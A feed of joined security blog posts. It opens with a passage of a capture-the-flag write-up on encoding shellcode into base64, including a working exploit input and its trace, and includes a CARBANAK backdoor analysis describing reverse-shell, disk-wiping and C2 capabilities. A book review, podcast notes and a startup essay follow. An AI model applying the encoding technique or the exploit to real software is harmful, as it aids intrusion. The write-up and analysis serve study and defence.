We can verify it's all base64 by eyeballing it. We can also determine that it's 0x9d bytes long, which means to get to 0x141 we need to pad it with 0xa4 bytes (already included above) before the encoded data.

We can dump allll that code into a file, and run it with run_raw_code (don't forget to apply the patch from earlier to change the base address to 0x41410000, and don't forget to compile with -m32 for 32-bit mode):

$ nasm -o file file.asm
$ strace ./run_raw_code ./file
read(3, "hAAAAX5AAAAPPPPPPPPahABjjX5AC++P"..., 333) = 333
exit(1094795585)                        = ?
+++ exited with 65 +++

It works! And it only took me two tries (I missed the 'inc ecx' lines the first time :) ).

I realize that it's a bit inefficient to encode 3 lines into like 100, but that's the cost of having a limited character set!

Solving the level

Bringing it back to the actual challenge...

Now that we have working base 64 code, the rest is pretty simple. Since the app encodes the base64 for us, we have to take what we have and decode it first, to get the string that would generate the base64 we want.

Because base64 works in blocks and has padding, we're going to append a few meaningless bytes to the end so that if anything gets messed up by being a partial block, they will.

Here's the full "exploit", assembled:


We're going to add a few 'A's to the end for padding (the character we choose is meaningless), and run it through base64 -d (adding '='s to the end until we stop getting decoding errors):

00000000  84 00 00 01 7e 40 00 00  0f 3c f3 cf 3c f3 da 84  |....~@...<..<...|
00000010  00 63 8d 7e 40 0b ef 8f  62 10 01 00 06 75 40 08  |.c.~@...b....u@.|
00000020  45 00 00 17 e7 d0 00 00  f6 41 d5 00 00 00 00 21  |E........A.....!|
00000030  00 08 e3 67 54 00 84 50  00 01 7e 7d 00 00 0f 64  |...gT..P..~}...d|
00000040  15 91 2d 90 f5 40 00 00  00 08 63 8d b0 19 d5 00  |..-..@....c.....|
00000050  21 14 00 00 5f 9f 40 00  03 d9 05 64 4b 2d 90 c3  |!..._.@....dK-..|
00000060  d5 00 21 14 00 00 5f 9f  40 00 03 d9 05 64 4b 2c  |..!..._.@....dK,|
00000070  b6 43 0c 3d 50 00 00 00  00 00 00 00 00 00 00 00  |.C.=P...........|
00000080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000b0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000c0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000d0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000e0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000f0  03 20 80 00 0c fe fb ef  bf 00 00 00 00 00        |. ............|

Let's convert that into a string that we can use on the commandline by chaining together a bunch of shell commands:


And, finally, feed all that into b-64-b-tuff:

$ echo -ne '\x84\x00\x00\x01\x7e\x40\x00\x00\x0f\x3c\xf3\xcf\x3c\xf3\xda\x84\x00\x63\x8d\x7e\x40\x0b\xef\x8f\x62\x10\x01\x00\x06\x75\x40\x08\x45\x00\x00\x17\xe7\xd0\x00\x00\xf6\x41\xd5\x00\x00\x00\x00\x21\x00\x08\xe3\x67\x54\x00\x84\x50\x00\x01\x7e\x7d\x00\x00\x0f\x64\x15\x91\x2d\x90\xf5\x40\x00\x00\x00\x08\x63\x8d\xb0\x19\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2d\x90\xc3\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2c\xb6\x43\x0c\x3d\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x20\x80\x00\x0c\xfe\xfb\xef\xbf\x00\x00\x00\x00\x00' | strace ./b-64-b-tuff
read(0, "\204\0\0\1~@\0\0\17<\363\317<\363\332\204\0c\215~@\v\357\217b\20\1\0\6u@\10"..., 4096) = 254
write(1, "Read 254 bytes!\n", 16Read 254 bytes!
)       = 16
write(1, "\n", 1
)                       = 1
exit(1094795585)                        = ?
+++ exited with 65 +++

And, sure enough, it exited with the status that we wanted! Now that we've encoded 12 bytes of shellcode, we can encode any amount of arbitrary code that we choose to!


So that, ladies and gentlemen and everyone else, is how to encode some simple shellcode into base64 by hand. My solution does almost exactly those steps, but in an automated fashion. I also found a few shortcuts while writing the blog that aren't included in that code.

To summarize:

  • Pad the input to a multiple of 4 bytes
  • Break the input up into 4-byte blocks, and find an xor pair that generates each value
  • Set ecx to a value that's 0x41 bits before the encoded payload, which is half of the xor pairs
  • Put the other half the xor pair in-line, loaded into edx and xor'd with the encoded payload
  • If there are any MSB bits set, set edx to 0x80 and use the stack to shift them into the right place to be inserted with a xor
  • After all the xors, add padding that's base64-compatible, but is effectively a no-op, to bridge between the decoder and the encoded payload
  • End with the encoded stub (second half of the xor pairs)

When the code runs, it xors each pair, and writes it in-line to where the encoded value was. It sets the MSB bits as needed. The padding runs, which is an effective no-op, then finally the freshly decoded code runs.

It's complex, but hopefully this blog helps explain it!

Book review: The Car Hacker’s Handbook

So, this is going to be a bit of an unusual blog for me. I usually focus on technical stuff, exploitation, hacking, etc. But this post will be a mixture of a book review, some discussion on my security review process, and whatever asides fall out of my keyboard when I hit it for long enough. But, don't fear! I have a nice heavy technical blog ready to go for tomorrow!


Let's kick this off with some pointless backstory! Skip to the next <h1> heading if you don't care how this blog post came about. :)

So, a couple years ago, I thought I'd give Audible a try, and read (err, listen to) some Audiobooks. I was driving from LA to San Francisco, and picked up a fiction book (one of Terry Pratchett's books in the Tiffany Aching series). I hated it (the audio experience), but left Audible installed and my account active.

A few months ago, on a whim, I figured I'd try a non-fiction book. I picked up NOFX's book, "The Hepatitis Bathtub and Other Stories". It was read by the band members and it was super enjoyable to listen while walking and exercising! And, it turns out, Audible had been giving me credits for some reason, and I have like 15 free books or something that I've been consuming like crazy.

Since my real-life friends are sick of listening to me talk about all books I'm reading, I started amusing myself by posting mini-reviews on Facebook, which got some good feedback.

That got me thinking: writing book reviews is kinda fun!

Then a few days ago, I was talking to a publisher friend at Rocky Mountain books , and he mentioned how he there's a reviewer who they sent a bunch of books to, and who didn't write any reviews. My natural thought was, "wow, what a jerk!".

Then I remembered: I'd promised No Starch that I'd write about The Car Hacker's Handbook like two years ago, and totally forgot. Am I the evil scientist jerk?

So now, after re-reading the book, you get to hear my opinions. :)

Threat Models

I've never really written about a technical book before, at least, not to a technical audience. So bear with this stream-of-consciousness style. :)

I think my favourite part of the book is the layout. When writing a book about car hacking to a technical audience, there's always a temptation to start with the "cool stuff" - protocols, exploits, stuff like that. It's also easy to forget about the varied level of your audience, and to assume knowledge. Since I have absolutely zero knowledge about car hacking (or cars, for that matter; my proudest accomplishment is filling the washer fluid by the third try and pulling up to the correct side of the gas pumps), I was a little worried.

At my current job (and previous one), I do product security reviews. I go through the cycle of: "here's something you've never seen before: ramp up, become an expert, and give us good advice. You have one week". If you ever have to do this, here's my best advice: just ask the engineers where they think the security problems are. In 5 minutes of casual conversation, you can find all the problems in a system and look like a hero. I love engineers. :)

But what happens when the engineers don't have security experience, or take an adversarial approach? Or when you want a more thorough / complete review?

That's how I learned to make threat models! Threat models are simply a way to discover the "attack surface", which is where you need to focus your attention as a reviewer (or developer). If you Google the term, you'll find lots of technical information on the "right way" to make a threat model. You might hear about STRIDE (spoofing/tampering/repudiation/information disclosure/denial of service/escalation of privileges). When I tried to use that, I tended to always get stuck on the same question: "what the heck IS 'repudiation', anyways?".

But yeah, that doesn't really matter. I use STRIDE to help me come up with questions and scenarios, but I don't do anything more formal than that.

If you are approaching a new system, and you want a threat model, here's what you do: figure out (or ask) what the pieces are, and how they fit together. The pieces could be servers, processes, data levels, anything like that; basically, things with a different "trust level", or things that shouldn't have full unfettered access to each other (read, or write, or both).

Once you have all that figured out, look at each piece and each connection between pairs of pieces and try to think of what can go wrong. Is plaintext data passing through an insecure medium? Is the user authentication/authorization happening in the right place? Is the traffic all repudiatable (once we figure out what that means)? Can data be forged? Or changed?

It doesn't have to be hard. It doesn't have to match any particular standard. Just figure out what the pieces are and where things can go wrong. If you start there, the rest of a security review is much, much easier for both you and the engineers you're working with. And speaking of the engineers: it's almost always worth the time to work together with engineers to develop a threat model, because they'll remember it next time.

Anyway, getting back to the point: that's the exact starting point that the Car Hacker's Handbook takes! The very first chapter is called "Understanding Threat Models". It opens by taking a "bird's eye view" of a car's systems, and talking about the big pieces: the cellular receiver, the Bluetooth, the wifi, the "infotainment" console, and so on. All these pieces that I was vaguely aware of in my car, but didn't really know the specifics of.

It then breaks them down into the protocols they use, what the range is, and how they're parsed. For example, the Bluetooth is "near range", and is often handled by "Bluez". USB is, obviously, a cable connection, and is typically handled by udev in the kernel. And so on.

Then they look at the potential threats: remotely taking over a vehicle, unlocking it, stealing it, tracking it, and so on.

For every protocol, it looks at every potential threat and how it might be affected.

This is the perfect place to start! The authors made the right choice, no doubt about it!

(Sidenote: because the rule of comedy is that 3 references to something is funnier than 2, and I couldn't find a logical third place to mention it, I just want to say "repudiation" again.)


If you read my blog regularly, you know that I love protocols. The reason I got into information security in the first place was by reverse engineering Starcraft's game protocol and implementing and documenting it (others had reversed it before, but nobody had published the information).

So I found the section on protocols intriguing! It's not like the olden days, when every protocol was custom and proprietary and weird: most of the protocols are well documented, and it just requires the right hardware to interface with it.

I don't want to dwell on this too much, but the book spends a TON of time talking about how to find physical ports, sniff protocols, understand what you're seeing, and figure out how to do things like unlock your doors in a logical, step-by-step manner. These protocols are all new to me, but I loved the logical approach that they took throughout the protocol chapters. For somebody like me, having no experience with car hacking or even embedded systems, it was super easy to follow and super informative!

It's good enough that I wanted to buy a new car just so I could hack it. Unfortunately, my accountant didn't think I'd be able to write it off as a business expense. :(


After going over the protocols, the book moves to attacks. I had just taken a really good class on hardware exploitation, and many of the same principles applied: dumping firmware, reverse engineering it, and exploring the attack surfaces.

Not being a hardware guy, I don't really want to attempt to reproduce this part in any great detail. It goes into a ton of detail on building out a lab, exploring attack surfaces (like the "infotainment" system, vehicle-to-vehicle communication, and even using SDR (software defined radio) to eavesdrop and inject into the wireless communication streams).


So yeah, this book is definitely well worth the read!

The progression is logical, and it's an incredible introduction, even for somebody with absolutely no knowledge of cars or embedded systems!

Also: I'd love to hear feedback on this post! I'm always looking for new things to write about, and if people legitimately enjoy hearing about the books I read, I'll definitely do more of this!

Behind the CARBANAK Backdoor

In this blog, we will take a closer look at the powerful, versatile backdoor known as CARBANAK (aka Anunak). Specifically, we will focus on the operational details of its use over the past few years, including its configuration, the minor variations observed from sample to sample, and its evolution. With these details, we will then draw some conclusions about the operators of CARBANAK. For some additional background on the CARBANAK backdoor, see the papers by Kaspersky and Group-IB and Fox-It.

Technical Analysis

Before we dive into the meat of this blog, a brief technical analysis of the backdoor is necessary to provide some context. CARBANAK is a full-featured backdoor with data-stealing capabilities and a plugin architecture. Some of its capabilities include key logging, desktop video capture, VNC, HTTP form grabbing, file system management, file transfer, TCP tunneling, HTTP proxy, OS destruction, POS and Outlook data theft and reverse shell. Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen and some were added over time.

Monitoring Threads

The backdoor may optionally start one or more threads that perform continuous monitoring for various purposes, as described in Table 1.  

Thread Name


Key logger

Logs key strokes for configured processes and sends them to the command and control (C2) server

Form grabber

Monitors HTTP traffic for form data and sends it to the C2 server

POS monitor

Monitors for changes to logs stored in C:\NSB\Coalition\Logs and nsb.pos.client.log and sends parsed data to the C2 server

PST monitor

Searches recursively for newly created Outlook personal storage table (PST) files within user directories and sends them to the C2 server

HTTP proxy monitor

Monitors HTTP traffic for requests sent to HTTP proxies, saves the proxy address and credentials for future use

Table 1: Monitoring threads


In addition to its file management capabilities, this data-stealing backdoor supports 34 commands that can be received from the C2 server. After decryption, these 34 commands are plain text with parameters that are space delimited much like a command line. The command and parameter names are hashed before being compared by the binary, making it difficult to recover the original names of commands and parameters. Table 2 lists these commands.

Command Hash

Command Name




Runs each command specified in the configuration file (see the Configuration section).



Updates the state value (see the Configuration section).



Desktop video recording



Downloads executable and injects into new process



Ammyy Admin tool



Updates self



Add/Update klgconfig (analysis incomplete)



Starts HTTP proxy



Renders computer unbootable by wiping the MBR



Reboots the operating system



Creates a network tunnel



Adds new C2 server or proxy address for pseudo-HTTP protocol



Adds new C2 server for custom binary protocol



Creates or deletes Windows user account



Enables concurrent RDP (analysis incomplete)



Adds Notification Package (analysis incomplete)



Deletes file or service



Adds command to the configuration file (see the Configuration section)



Downloads executable and injects directly into new process



Send Windows accounts details to the C2 server



Takes a screenshot of the desktop and sends it to the C2 server



Backdoor sleeps until specified date






Upload files to the C2 server



Runs VNC plugin



Runs specified executable file



Uninstalls backdoor



Returns list of running processes to the C2 server



Change C2 protocol used by plugins



Download and execute shellcode from specified address



Terminates the first process found specified by name



Initiates a reverse shell to the C2 server



Plugin control



Updates backdoor

Table 2: Supported Commands


A configuration file resides in a file under the backdoor’s installation directory with the .bin extension. It contains commands in the same form as those listed in Table 2 that are automatically executed by the backdoor when it is started. These commands are also executed when the loadconfig command is issued. This file can be likened to a startup script for the backdoor. The state command sets a global variable containing a series of Boolean values represented as ASCII values ‘0’ or ‘1’ and also adds itself to the configuration file. Some of these values indicate which C2 protocol to use, whether the backdoor has been installed, and whether the PST monitoring thread is running or not. Other than the state command, all commands in the configuration file are identified by their hash’s decimal value instead of their plain text name. Certain commands, when executed, add themselves to the configuration so they will persist across (or be part of) reboots. The loadconfig and state commands are executed during initialization, effectively creating the configuration file if it does not exist and writing the state command to it.

Figure 1 and Figure 2 illustrate some sample, decoded configuration files we have come across in our investigations.

Figure 1: Configuration file that adds new C2 server and forces the data-stealing backdoor to use it

Figure 2: Configuration file that adds TCP tunnels and records desktop video

Command and Control

CARBANAK communicates to its C2 servers via pseudo-HTTP or a custom binary protocol.

Pseudo-HTTP Protocol

Messages for the pseudo-HTTP protocol are delimited with the ‘|’ character. A message starts with a host ID composed by concatenating a hash value generated from the computer’s hostname and MAC address to a string likely used as a campaign code. Once the message has been formatted, it is sandwiched between an additional two fields of randomly generated strings of upper and lower case alphabet characters. An example of a command polling message and a response to the listprocess command are given in Figure 3 and Figure 4, respectively.

Figure 3: Example command polling message

Figure 4: Example command response message

Messages are encrypted using Microsoft’s implementation of RC2 in CBC mode with PKCS#5 padding. The encrypted message is then Base64 encoded, replacing all the ‘/’ and ‘+’ characters with the ‘.’ and ‘-’ characters, respectively. The eight-byte initialization vector (IV) is a randomly generated string consisting of upper and lower case alphabet characters. It is prepended to the encrypted and encoded message.

The encoded payload is then made to look like a URI by having a random number of ‘/’ characters inserted at random locations within the encoded payload. The malware then appends a script extension (php, bml, or cgi) with a random number of random parameters or a file extension from the following list with no parameters: gif, jpg, png, htm, html, php.

This URI is then used in a GET or POST request. The body of the POST request may contain files contained in the cabinet format. A sample GET request is shown in Figure 5.

Figure 5: Sample pseudo-HTTP beacon

The pseudo-HTTP protocol uses any proxies discovered by the HTTP proxy monitoring thread or added by the adminka command. The backdoor also searches for proxy configurations to use in the registry at HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings and for each profile in the Mozilla Firefox configuration file at %AppData%\Mozilla\Firefox\<ProfileName>\prefs.js.

Custom Binary Protocol

Figure 6 describes the structure of the malware’s custom binary protocol. If a message is larger than 150 bytes, it is compressed with an unidentified algorithm. If a message is larger than 4096 bytes, it is broken into compressed chunks. This protocol has undergone several changes over the years, each version building upon the previous version in some way. These changes were likely introduced to render existing network signatures ineffective and to make signature creation more difficult.

Figure 6: Binary protocol message format

Version 1

In the earliest version of the binary protocol, we have discovered that the message bodies that are stored in the <chunkData> field are simply XORed with the host ID. The initial message is not encrypted and contains the host ID.

Version 2

Rather than using the host ID as the key, this version uses a random XOR key between 32 and 64 bytes in length that is generated for each session. This key is sent in the initial message.

Version 3

Version 3 adds encryption to the headers. The first 19 bytes of the message headers (up to the <hdrXORKey2> field) are XORed with a five-byte key that is randomly generated per message and stored in the <hdrXORKey2> field. If the <flag> field of the message header is greater than one, the XOR key used to encrypt message bodies is iterated in reverse when encrypting and decrypting messages.

Version 4

This version adds a bit more complexity to the header encryption scheme. The headers are XOR encrypted with <hdrXORKey1> and <hdrXORKey2> combined and reversed.

Version 5

Version 5 is the most sophisticated of the binary protocols we have seen. A 256-bit AES session key is generated and used to encrypt both message headers and bodies separately. Initially, the key is sent to the C2 server with the entire message and headers encrypted with the RSA key exchange algorithm. All subsequent messages are encrypted with AES in CBC mode. The use of public key cryptography makes decryption of the session key infeasible without the C2 server’s private key.

The Roundup

We have rounded up 220 samples of the CARBANAK backdoor and compiled a table that highlights some interesting details that we were able to extract. It should be noted that in most of these cases the backdoor was embedded as a packed payload in another executable or in a weaponized document file of some kind. The MD5 hash is for the original executable file that eventually launches CARBANAK, but the details of each sample were extracted from memory during execution. This data provides us with a unique insight into the operational aspect of CARBANAK and can be downloaded here.

Protocol Evolution

As described earlier, CARBANAK’s binary protocol has undergone several significant changes over the years. Figure 7 illustrates a rough timeline of this evolution based on the compile times of samples we have in our collection. This may not be entirely accurate because our visibility is not complete, but it gives us a general idea as to when the changes occurred. It has been observed that some builds of this data-stealing backdoor use outdated versions of the protocol. This may suggest multiple groups of operators compiling their own builds of this data-stealing backdoor independently.

Figure 7: Timeline of binary protocol versions

*It is likely that we are missing an earlier build that utilized version 3.

Build Tool

Most of CARBANAK’s strings are encrypted in order to make analysis more difficult. We have observed that the key and the cipher texts for all the encrypted strings are changed for each sample that we have encountered, even amongst samples with the same compile time. The RC2 key used for the HTTP protocol has also been observed to change among samples with the same compile time. These observations paired with the use of campaign codes that must be configured denote the likely existence of a build tool.

Rapid Builds

Despite the likelihood of a build tool, we have found 57 unique compile times in our sample set, with some of the compile times being quite close in proximity. For example, on May 20, 2014, two builds were compiled approximately four hours apart and were configured to use the same C2 servers. Again, on July 30, 2015, two builds were compiled approximately 12 hours apart.

What changes in the code can we see in such short time intervals that would not be present in a build tool? In one case, one build was programmed to execute the runmem command for a file named wi.exe while the other was not. This command downloads an executable from the C2 and directly runs it in memory. In another case, one build was programmed to check for the existence of the domain in the trusted sites list for Internet Explorer while the other was not. Blizko is an online money transfer service. We have also seen that different monitoring threads from Table 1 are enabled from build to build. These minor changes suggest that the code is quickly modified and compiled to adapt to the needs of the operator for particular targets.

Campaign Code and Compile Time Correlation

In some cases, there is a close proximity of the compile time of a CARBANAK sample to the month specified in a particular campaign code. Figure 8 shows some of the relationships that can be observed in our data set.

Campaign Code

Compile Date































Figure 8: Campaign code to compile time relationships

Recent Updates

Recently, 64 bit variants of the backdoor have been discovered. We shared details about such variants in a recent blog post. Some of these variants are programmed to sleep until a configured activation date when they will become active.


The “Carbanak Group”

Much of the publicly released reporting surrounding the CARBANAK malware refers to a corresponding “Carbanak Group”, who appears to be behind the malicious activity associated with this data-stealing backdoor. FireEye iSIGHT Intelligence has tracked several separate overarching campaigns employing the CARBANAK tool and other associated backdoors, such as DRIFTPIN (aka Toshliph). With the data available at this time, it is unclear how interconnected these campaigns are – if they are all directly orchestrated by the same criminal group, or if these campaigns were perpetrated by loosely affiliated actors sharing malware and techniques.


In all Mandiant investigations to date where the CARBANAK backdoor has been discovered, the activity has been attributed to the FIN7 threat group. FIN7 has been extremely active against the U.S. restaurant and hospitality industries since mid-2015.

FIN7 uses CARBANAK as a post-exploitation tool in later phases of an intrusion to cement their foothold in a network and maintain access, frequently using the video command to monitor users and learn about the victim network, as well as the tunnel command to proxy connections into isolated portions of the victim environment. FIN7 has consistently utilized legally purchased code signing certificates to sign their CARBANAK payloads. Finally, FIN7 has leveraged several new techniques that we have not observed in other CARBANAK related activity.

We have covered recent FIN7 activity in previous public blog posts:

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on our investigations and observations into FIN7 activity.

Widespread Bank Targeting Throughout the U.S., Middle East and Asia

Proofpoint initially reported on a widespread campaign targeting banks and financial organizations throughout the U.S. and Middle East in early 2016. We identified several additional organizations in these regions, as well as in Southeast Asia and Southwest Asia being targeted by the same attackers.

This cluster of activity persisted from late 2014 into early 2016. Most notably, the infrastructure utilized in this campaign overlapped with LAZIOK, NETWIRE and other malware targeting similar financial entities in these regions.


DRIFTPIN (aka Spy.Agent.ORM, and Toshliph) has been previously associated with CARBANAK in various campaigns. We have seen it deployed in initial spear phishing by FIN7 in the first half of 2016.  Also, in late 2015, ESET reported on CARBANAK associated attacks, detailing a spear phishing campaign targeting Russian and Eastern European banks using DRIFTPIN as the malicious payload. Cyphort Labs also revealed that variants of DRIFTPIN associated with this cluster of activity had been deployed via the RIG exploit kit placed on two compromised Ukrainian banks’ websites.

FireEye iSIGHT Intelligence observed this wave of spear phishing aimed at a large array of targets, including U.S. financial institutions and companies associated with Bitcoin trading and mining activities. This cluster of activity continues to be active now to this day, targeting similar entities. Additional details on this latest activity are available on the FireEye iSIGHT Intelligence MySIGHT Portal.

Earlier CARBANAK Activity

In December 2014, Group-IB and Fox-IT released a report about an organized criminal group using malware called "Anunak" that has targeted Eastern European banks, U.S. and European point-of-sale systems and other entities. Kaspersky released a similar report about the same group under the name "Carbanak" in February 2015. The name “Carbanak” was coined by Kaspersky in this report – the malware authors refer to the backdoor as Anunak.

This activity was further linked to the 2014 exploitation of ATMs in Ukraine. Additionally, some of this early activity shares a similarity with current FIN7 operations – the use of Power Admin PAExec for lateral movement.


The details that can be extracted from CARBANAK provide us with a unique insight into the operational details behind this data-stealing malware. Several inferences can be made when looking at such data in bulk as we discussed above and are summarized as follows:

  1. Based upon the information we have observed, we believe that at least some of the operators of CARBANAK either have access to the source code directly with knowledge on how to modify it or have a close relationship to the developer(s).
  2. Some of the operators may be compiling their own builds of the backdoor independently.
  3. A build tool is likely being used by these attackers that allows the operator to configure details such as C2 addresses, C2 encryption keys, and a campaign code. This build tool encrypts the binary’s strings with a fresh key for each build.
  4. Varying campaign codes indicate that independent or loosely affiliated criminal actors are employing CARBANAK in a wide-range of intrusions that target a variety of industries but are especially directed at financial institutions across the globe, as well as the restaurant and hospitality sectors within the U.S.

Startup Security Weekly #43 – Never Stop Believing

The six secrets to starting smart, a startup’s guide to protecting trade secrets, knowing what your customers value, and more articles for discussion. In the news, updates from Netskope, Yubikey, CybelAngel, and more on this episode of Startup Security Weekly!

Full Show Notes: Visit for all the latest episodes!

Startup Security Weekly #44 – Selling Ice to an Eskimo

Tarun Desikan of Banyan joins us alongside guest host Matt Alderman. In the news, negotiation mistakes that are hurting your deals, hiring re-founders, updates from Hexadite, Amazon, Sqrrl, and more on this episode of Startup Security Weekly!

Full Show Notes: Visit for all the latest episodes!

Enterprise Security Weekly #48 – Making Everybody Mad

Paul and John discuss building an internal penetration testing team. In the news, automating all the things, Juniper Networks opens a software-defined security ecosystem, millions of devices are running out-of-date systems, Duo and McAfee join forces, and more in this episode of Enterprise Security Weekly!Full Show Notes: for all the latest episodes!

Blackhat, BSidesLV and DEF CON Parties 2017


Back once again for the Blackhat, BSidesLV and DEF CON Parties 2017. Here is the list. Please note that this is a work in progress and I’ll be sure to add more as I become aware of them.

Please note that this sched should work fine in most smart phone browsers.


Be sure to RSVP for parties listed that note that as the vast majority will not be allowing folks to register at the door. Please note that events which are not searchable, or have not directly requested I post them, will not be included here.

Got a Party?

Most importantly, if I’m missing a 2017 party here, please let me know through our contact us form and I’ll be sure to add them.

Copyright: pressmaster / 123RF Stock Photo


The post Blackhat, BSidesLV and DEF CON Parties 2017 appeared first on Liquidmatrix Security Digest.

What’s It Like to Join a Startup’s Executive Team?

Startups are the innovation engine of the high-tech industry. Those who’ve participated in them have experienced the thrill and at times the disappointment of navigating uncharted territories of new ideas. Others have benefited from the fruits of these risk-takers’ labor by using the products they created.

What’s it like to contribute at an early stage of a startup? Below are my reflections on the first few months I’ve spent at Minerva so far. I joined this young endpoint security company as VP of Products not too long ago (and I’m loving it). I’ve outlined some takeaways in a generalized form that might benefit others in a similar position or those that are curious about entrepreneurial environments.

Situational Awareness: Where Am I?

When you come into a company—large or small—you already have some idea regarding the type of the organization you’re joining. Your understanding is incomplete at best. After all, it’s is based on your perspective as an outsider, and is informed mainly by the company’s official external communications (website, brochures, job posting) and the interactions you’ve had during the interviewing process.

Of course, you’ll learn as much as you can about the firm before deciding to come on board; validate all your assumptions and fill in the gaps in your understanding after starting the job:

  • If the company is small, this quite literally means taking the time to speak with as many of your new colleagues as possible, not only to start getting to know them, but also to understand their perspective on the company’s successes and challenges. Who are these individuals, what do they do, and how might you be of help?
  • Similarly, talk to the board members: What are they most excited about? What are their biggest concerns? What do they expect of you? In what ways might they be able to help you in meeting those objectives, on the basis of their expertise and connections? How involved do they want to be in the company’s operations and your activities?
  • In addition, understand the mindset of the company’s customers and partners. What do they appreciate the most about the firm? Where do they see opportunities for improvements? How do they collaborate with the company today? How might you assist them in the short and long term? Where might they help you?

At this initial stage on your involvement with the company, you still have the benefit of easily asking questions that later might sound silly. At the moment, it’s also easier to let yourself say “I don’t know, but I’ll find out” when you face a question you cannot answer. You’re gaining situational awareness, starting to understand your tools and priorities, getting to know the people, and adjusting the mental model you’ve built while you were still an outsider to the firm.

I had the benefit of participating in Minerva’s Advisory Board prior to becoming an employee. This allowed me get to know some of my future colleagues and confirm that we’ll get along, as well as to make sure that we’re aligned on the company’s direction. Still, only after spending several weeks immersed in the company’s day-to-day activities did I truly begin to feel like I knew where I was and I was doing there.

Takeaways: It takes longer than you might expect to feel fully engaged and productive with the new team. Do your research beforehand, but accept that you can only see a sliver of the actual company. Interact with others as much as possible, but leave time for reflection.

Self-Discovery: Who Are We?

If you’re joining a startup’s executive team, there’s a good chance that it’s entering a new phase of its life cycle. In the case of Minerva, I came on board as the company was preparing to enter the US market. It was starting to build a sales force and formalize its go-to-market strategy. The firm has been in existence for three years by that time, which allowed it to build the underlying framework and several product components. It gained feedback from early customers, assembled the R&D team and was ready to make itself known to the world.

After establishing an executive team, the startup will likely be looking to learn from its experiences so far and determine the direction for the next stage of its development. Since you’re new to the effort, you’ll need to begin by learning about colleague’s impressions and ideas before voicing your own. However, don’t wait too long before sharing your opinions. For the next few weeks you still have the fresh perspective that allows you to empathize with outsiders—customers, analysts, partners, investors—in a way that’s very difficult to do once you’ve formally integrated into the collective.

Lots of frameworks exist for helping you and other members of the executive team determine the business strategy. You can start with SWOT analysis, which, as Wikipedia summarizes, encourages you to understand the following aspects of your firm:

  • Strengths: characteristics of the business … that give it an advantage over others
  • Weaknesses: characteristics of the business that place [it] at a disadvantage relative to others
  • Opportunities: elements in the environment that the business … could exploit to its advantage
  • Threats: elements in the environment that could cause trouble for the business”

If, like me, you are focused on product management, you might benefit from my Product Management Framework for Creating Security Products, which recommends asking and answering the following questions:

It will likely take many brainstorming sessions, informal conversations, emails and adviser interactions to understand and verbalize the way in which your solution is related to other products your ecosystem. What problems are you solving and, most importantly, what are you not trying to tackle? What’s your competition? Why should customers care about you? What will industry analysts think?  Once you’ve figured this out, know you’ll need to adjust as the company and the market evolves.

As with any self-reflective experience, determining who you are and how you hope to be perceived by others is both challenging and exhilarating. Engaging in this exercise forces you to ask tough questions about yourself. You also need to tap into your inner optimist to envision a future in which you’ll succeed despite, or perhaps because, of the challenging road ahead.

In the case of Minerva, the company developed a unique way of combating evasive malware. However, having a strong technological base alone is insufficient: we needed to determine how to explain not only what we do, but why customers would benefit from the solution in a way that they cannot with the existing security layers. How are we related to baseline anti-malware tools? What about the “next-gen” players? (For more on this, see my Questions for Endpoint Security Startups post.)

Takeaways: Harness the external perspective you have after just joining the firm to introduce new ideas and challenge the old ones. Recognize that marketing and management frameworks are just suggestions for how to devise a business strategy. Be realistic about market dynamics and possibilities, but remember the need to stay optimistic when embarking upon new ventures.

External Communication

Once you understand where you are and who your company is, you’re ready to explain this to others. That means making your presence known in the targeted markets, as you begin to fill the sales pipeline and close deals, and as you continue to develop your product. You’re not only interacting with prospective customers directly, but are also working with industry analysts and other influences, educating them about your existence and value proposition, and soliciting feedback regarding the vision for your product.

Your company probably has a budding sales force, which you need to equip with the tools they’ll use when explaining the value of your solution. Depending on your specific role, you might be tasked with creating, contributing, or providing feedback on internal documentation that summarizes the results of the earlier self-discovery process to keep everyone in the company informed and marching to the same beat. Ditto for external-facing collateral, such as the company’s website contents, brochures, whitepapers, etc. Much of the documents the company developed in its earlier stages might need to be revised, retired or expanded.

External communications are about persuasion: you need to convince others to pay attention to your ideas and solutions, which often entails changing their perspective and challenging their assumptions.

You’re passionate about the benefits of your technology; yet, organizations are cautious of newcomers. Moreover, the market is dominated by the rhetoric of the incumbents, which requires the new entrants to clearly articulate how they fit into the existing marketplace and educate prospects about seeing through the marketing hype. To be heard, a young company must engage in persuasive communications as it builds up its core customer base and establishes a reputation. As a member of the executive team, it’s up to you to make this happen.

As I write this, Minerva just announced the closing of a Series A funding round. Encouraged by the enthusiasm of early adopters and the feedback from prospects, we established a sales team, formalized product roadmap plans, and updated the company’s marketing collateral. A lot of my time is spent speaking with prospects, customers, analysts, partners and, of course, colleagues, in addition to continuing to enhance the product.

